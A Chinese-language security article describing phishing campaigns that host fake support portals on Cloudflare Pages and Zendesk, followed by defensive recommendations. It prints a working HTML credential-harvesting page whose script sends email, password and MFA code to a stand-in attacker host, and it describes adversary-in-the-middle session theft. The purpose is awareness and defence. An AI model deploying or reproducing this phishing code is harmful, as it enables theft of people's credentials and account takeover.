钓鱼新变种:攻击者借Cloudflare Pages与Zendesk“合法外衣”伪造客服门户,企业凭证安全防线告急

简介: 一封伪装成工单升级的钓鱼邮件,利用Cloudflare Pages和Zendesk等可信平台托管仿冒页面,窃取企业账户凭证。攻击者绕过MFA,盗取会话Cookie,数小时内入侵财务系统。此类新型钓鱼依托合法域名规避传统防御,暴露“可信即安全”的认知盲区。专家呼吁构建零信任模型,强化行为监测与员工培训,应对日益隐蔽的网络威胁。(238字)

一、一封“工单升级”邮件,竟成企业账户失守的导火索

2025年11月下旬,华东某跨境电商公司IT部门收到一封看似来自内部Zendesk支持系统的邮件。邮件主题为“【紧急】您的工单 #8472 已触发SLA超时,请立即验证身份以继续处理”。邮件内容专业、排版规范,附带一个“查看详情”的按钮,链接指向 support-verify.yourbrand.zendesk.com。

点击后,页面加载迅速,品牌Logo、配色方案、字体样式与该公司真实客服门户几乎一致。用户被要求“重新登录以确认身份”,并输入一次性验证码(MFA)。操作完成后,系统提示“验证成功,工单正在处理中”。

然而,短短两小时后,该公司财务系统后台出现异常登录记录——攻击者利用窃取的会话Cookie,绕过了MFA,直接访问了包含供应商付款信息的敏感模块。

这并非孤例。过去三个月,全球至少有17起类似事件被公开披露,涉及金融、制造、SaaS服务等多个行业。而这些钓鱼页面的共同点在于:它们并非托管在可疑域名或黑产服务器上,而是“光明正大”地运行在 Cloudflare Pages 和 Zendesk Help Center 这类主流、可信的云服务平台之上。

二、合法平台成“钓鱼温床”?攻击者如何钻空子

传统反钓鱼机制高度依赖域名信誉体系。例如,企业邮件网关会自动拦截来自 .xyz、.top 或已知恶意IP的链接;浏览器也会对列入黑名单的站点弹出警告。但当钓鱼页面出现在 *.pages.dev(Cloudflar Pages默认子域)或 *.zendesk.com(Zendesk官方托管域)之下时,这些防线瞬间失效。

“这相当于小偷穿上了保安制服,在大厦正门刷卡进入。”公共互联网反网络钓鱼工作组技术专家芦笛指出,“攻击者不再需要注册域名、租用VPS、配置SSL证书——这些繁琐且易被追踪的步骤,如今只需一个免费账号和几行代码即可完成。”

技术拆解:一页代码,即可构建高仿真钓鱼门户

以 Cloudflare Pages 为例,攻击者只需以下几步:

注册 Cloudflare 账号(无需实名,支持匿名邮箱);

创建静态网站项目,上传仿冒页面HTML/CSS/JS;

绑定自定义子路径或使用默认 *.pages.dev 域名;

嵌入数据回传逻辑(如通过 Webhook 或代理转发)。

下面是一个简化版的钓鱼页面核心代码片段(仅用于技术分析,严禁滥用):

<!-- fake-support.html -->

<!DOCTYPE html>

<html>

<head>

<meta charset="UTF-8">

<title>【YourBrand】客服支持中心</title>

<link rel="stylesheet" href="/assets/yourbrand-style.css">

</head>

<body>

<div>

<img src="/logo.png" alt="YourBrand Logo">

<h2>请验证您的账户以继续处理工单 #8472</h2>

<form id="phishForm">

<input type="email" name="email" placeholder="企业邮箱" required>

<input type="password" name="password" placeholder="密码" required>

<input type="text" name="mfa_code" placeholder="一次性验证码 (MFA)" required>

<button type="submit">提交验证</button>

</form>

</div>

<script>

document.getElementById('phishForm').addEventListener('submit', async (e) => {

e.preventDefault();

const data = new FormData(e.target);

// 将凭证发送至攻击者控制的Webhook(如Discord、Telegram Bot或自建API)

await fetch('https://attacker-controlled-server.com/collect', {

method: 'POST',

body: JSON.stringify(Object.fromEntries(data)),

headers: {'Content-Type': 'application/json'}

});

// 模拟“验证成功”,跳转至真实Zendesk页面以消除怀疑

window.location.href = 'https://yourbrand.zendesk.com/hc/zh-cn';

});

</script>

</body>

</html>

更高级的攻击甚至会部署 反向代理(Reverse Proxy) 或 中间人(AitM, Adversary-in-the-Middle) 架构。例如,攻击者搭建一个代理层,将用户请求实时转发至真实Zendesk页面,同时截获登录过程中的 Cookie、Session Token 和 MFA 响应。这种方式下,用户看到的是完全真实的界面,连 HTTPS 锁图标都毫无破绽。

“这种攻击最难防御的地方在于:页面本身是‘干净’的,行为却极度危险。”芦笛强调,“传统WAF或内容扫描工具很难识别一段看似正常的HTML表单是否用于窃取凭证。”

三、国际案例频发,国内企业敲响警钟

2025年9月,美国网络安全公司 Proofpoint 披露了一起针对科技企业的钓鱼活动。攻击者利用 Cloudflare Pages 托管伪造的 Okta 登录页,并通过 LinkedIn 私信发送“安全警报”链接。受害者点击后,被引导至 okta-verify.pages.dev,页面完美复刻 Okta UI,甚至动态加载受害者公司Logo(通过URL参数注入)。该活动在两周内窃取了超过200个企业账户凭证。

同年10月,欧洲某银行遭遇类似攻击。钓鱼页面托管于 Zendesk 子域,伪装成“GDPR数据请求处理中心”,诱导员工上传包含客户身份证与银行卡信息的“合规文件”。事后调查发现,攻击者通过 Zendesk 的自定义主题功能注入恶意 JavaScript,实现数据外泄。

这些案例虽发生于海外,但对国内企业具有极强的警示意义。随着中国企业加速出海、广泛采用 SaaS 工具(如 Zendesk、Intercom、Freshdesk),以及越来越多开发者使用 Cloudflare Pages 部署官网或文档站,攻击面正在同步扩大。

“我们监测到,2025年下半年,国内针对企业客服流程的钓鱼尝试同比增长320%。”芦笛透露,“其中约35%的样本使用了主流云平台托管,且近半数能绕过企业现有邮件安全网关。”

四、为何传统防御失效?三大认知盲区亟待破除

盲区一:“可信域名=安全内容”

许多企业安全策略仍将“域名白名单”作为核心防线。例如,允许员工访问 *.zendesk.com、*.cloudflare.com 等。但正如前文所述,这些平台允许用户自定义内容,域名可信 ≠ 页面可信。

盲区二:“MFA万能论”

不少企业认为启用多因素认证(MFA)即可高枕无忧。然而,在 AitM 攻击模式下,攻击者可实时代理用户与真实服务之间的通信,在用户完成MFA验证的瞬间窃取有效会话,从而完全绕过二次验证。

盲区三:“静态页面无害论”

安全团队常认为静态HTML页面无法执行复杂攻击。但现代钓鱼页面可通过 <script> 标签加载外部资源、调用浏览器 API(如 navigator.credentials.get() 尝试提取已保存密码)、甚至利用 Service Worker 实现持久化监听。

五、技术对抗升级:从“堵漏洞”到“重构信任模型”

面对新型钓鱼威胁,专家建议企业采取多层次防御策略,核心在于 “零信任”原则 与 “行为驱动的安全”。

1. 严格限制第三方托管内容的访问权限

对 Cloudflare Pages、GitHub Pages、Netlify 等平台实施 URL路径级白名单,而非简单放行整个域名。

使用 内容安全策略(CSP) 限制页面可加载的脚本来源。例如:

Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted-cdn.com;

可有效阻止钓鱼页面加载外部数据回传脚本。

2. 强制高风险操作使用浏览器隔离或专用终端

对于涉及凭证输入、敏感数据上传的操作(如登录客服系统、提交工单附件),应通过 远程浏览器隔离(RBI) 或 虚拟应用容器 执行。即使页面被攻破,恶意代码也无法接触本地设备或网络。

3. 在通信链路中加入可验证签名

企业可在官方邮件或私信中嵌入 深度链接(Deep Link) 并附加数字签名。例如:

https://support.yourbrand.com/ticket/8472?sig=HMAC_SHA256(key, "8472")

用户点击后,目标页面需验证签名有效性,否则拒绝加载。此举可防止攻击者伪造“工单通知”。

4. 部署基于会话行为的MFA增强保护

即便会话Cookie被盗,也可通过以下机制阻断横向移动:

绑定设备指纹:将会话与浏览器 User-Agent、Canvas Hash、WebGL Renderer 等特征绑定;

实施短暂会话有效期:敏感操作需重新认证;

监控异常行为:如同一会话短时间内从不同国家登录,自动触发MFA挑战。

六、安全不是终点,而是持续博弈的过程

“网络钓鱼的本质从未改变——利用人性弱点。”芦笛总结道,“但攻击者的技术手段正在快速进化,从垃圾邮件到AI语音诈骗,再到如今的‘合法托管钓鱼’,每一步都在试探防御体系的边界。”

他呼吁企业摒弃“一次性加固”的思维,转而建立 动态感知-快速响应-持续教育 的闭环机制。例如,定期开展“红蓝对抗”演练,模拟 Cloudflare Pages 钓鱼场景;在IT支持流程中嵌入“二次确认”环节(如工单升级需电话核实);对员工进行“可疑链接识别”培训——不仅看域名,更要查页面行为。

与此同时,云服务商也需承担更多责任。芦笛建议 Cloudflare、Zendesk 等平台:

加强对新注册项目的自动化内容扫描;

对包含登录表单、敏感字段的页面实施人工审核;

提供安全标签(Security Tagging) 功能,允许企业标记“官方唯一支持入口”。

结语:在信任与怀疑之间,寻找安全的平衡点

当一个链接来自 *.zendesk.com,我们是否还应本能地信任它?当页面加载速度飞快、UI设计精美,我们是否就放松警惕?

这场攻防战的答案,或许不在于技术本身,而在于我们如何重新定义“可信”。在公共互联网日益复杂的今天,真正的安全,始于对“理所当然”的质疑。

而对于每一个企业而言,保护客户与员工的数据,不仅是技术责任,更是商业伦理的底线。在这场没有硝烟的战争中,唯有保持清醒、持续进化,方能在钓鱼者的“合法外衣”之下,守住那道看不见却至关重要的防线。

编辑:芦笛(公共互联网反网络钓鱼工作组)

目录
相关文章
|
16天前
|
存储 弹性计算 人工智能
2026年阿里云服务器价格表及活动报价、租用收费标准参考
阿里云服务器租用体系涵盖轻量应用服务器、ECS云服务器两大核心品类,专注满足通用建站、企业办公、高性能计算等多元需求,收费受实例类型、配置规格、计费方式及地域影响显著。同时推出全场景优惠活动,包括普惠降价、新人秒杀、新老同享福利及长期套餐折扣,部分活动有明确时效限制。
268 7
|
26天前
|
人工智能 弹性计算 运维
探秘 AgentRun丨为什么应该把 LangChain 等框架部署到函数计算 AgentRun
阿里云函数计算 AgentRun,专为 AI Agent 打造的一站式 Serverless 基础设施。无缝集成 LangChain、AgentScope 等主流框架,零代码改造即可享受弹性伸缩、企业级沙箱、模型高可用与全链路可观测能力,助力 Agent 高效、安全、低成本地落地生产。
311 48
|
21天前
|
机器学习/深度学习 人工智能 自然语言处理
老板们别慌!生成式AI商业战略实战宝典
想象你的老板突然说要用AI改造整个公司,你的内心是不是一万匹草泥马在奔腾?别担心,这份实战指南告诉你如何让AI为企业赋能而不是添乱。从技术选型到风险管控,从员工培训到文化变革,用最轻松的方式解读最前沿的AI商业战略。让你在老板面前秒变AI战略专家! #人工智能 #商业战略 #数字化转型 #企业创新
121 12
|
1月前
|
SQL 人工智能 分布式计算
从工单、文档到结构化知识库:一套可复用的 Agent 知识采集方案
我们构建了一套“自动提取 → 智能泛化 → 增量更新 → 向量化同步”的全链路自动化 pipeline,将 Agent 知识库建设中的收集、提质与维护难题转化为简单易用的 Python 工具,让知识高效、持续、低门槛地赋能智能体。
314 36
|
18天前
|
域名解析 弹性计算 安全
阿里云服务器新手实操手册:购买、配置、搭建流程指南
对于第一次接触阿里云服务器的新手来说,最困惑的往往是“怎么买更划算”“配置怎么选才适配需求”“网站搭建从哪下手”。其实整个流程核心围绕“选对优惠、配准参数、按步搭建”三个关键环节,只要理清每个步骤的逻辑和细节,就能顺利完成从购买到上线的全操作。本文结合阿里云最新规则和实操经验,用通俗的语言拆解完整流程,全程无营销表述,包含核心表格对比,帮新手避开常见误区。
412 10
|
24天前
|
数据采集 人工智能 IDE
告别碎片化日志:一套方案采集所有主流 AI 编程工具
本文介绍了一套基于MCP架构的轻量化、多AI工具代码采集方案,支持CLI、IDE等多类工具,实现用户无感、可扩展的数据采集,已对接Aone日志平台,助力AI代码采纳率分析与研发效能提升。
399 46
告别碎片化日志:一套方案采集所有主流 AI 编程工具
|
1月前
|
人工智能 安全 API
Nacos 安全护栏:MCP、Agent、配置全维防护,重塑 AI Registry 安全边界
Nacos安全新标杆:精细鉴权、无感灰度、全量审计!
699 67
|
4天前
|
存储 缓存 API
2026年OpenClaw(原Clawbot、MoltBot)极速部署教程及常见问题解惑
OpenClaw前身为Clawdbot、Moltbot,是一款开源本地优先的AI代理工具,可24小时响应自然语言指令,完成文件处理、信息查询、自动化协同等各类任务,适配个人办公与轻量团队协作场景。阿里云推出的OpenClaw一键部署方案,通过预置专属应用镜像,简化了传统部署的复杂配置流程,无需专业技术储备,即可快速在轻量应用服务器上完成部署与启用,依托阿里云稳定的基础设施,实现服务7×24小时不间断运行。本文严格遵循官方操作逻辑,详细拆解一键部署全流程、进阶配置、多渠道集成方法,并整理高频问题及解决方案,全程无营销词汇,不改变原意,兼顾新手友好性与实操性,适配2026年OpenClaw最新版本
442 6
|
13天前
|
人工智能 安全 机器人
AI 智能体的开发方法
AI智能体已超越对话机器人,演进为具备目标拆解、长期记忆与环境交互的自主系统。本文详解五大核心:架构设计(感知-思考-行动)、多Agent协作、数据驱动优化、安全护栏及主流开发范式,助您构建可靠数字员工。(239字)
|
10天前
|
存储 机器学习/深度学习 人工智能
文档切分实战:5种方法详解,打造高效RAG系统的第一步
本文深入解析RAG中至关重要的文档切分技术,系统介绍5种主流策略(句子、定长、重叠、递归、语义切分),结合代码示例与实战调优技巧,涵盖PDF/Markdown/代码等多格式处理,并提供质量评估与避坑指南,助你打造高精度、高效率的私有知识库。
121 7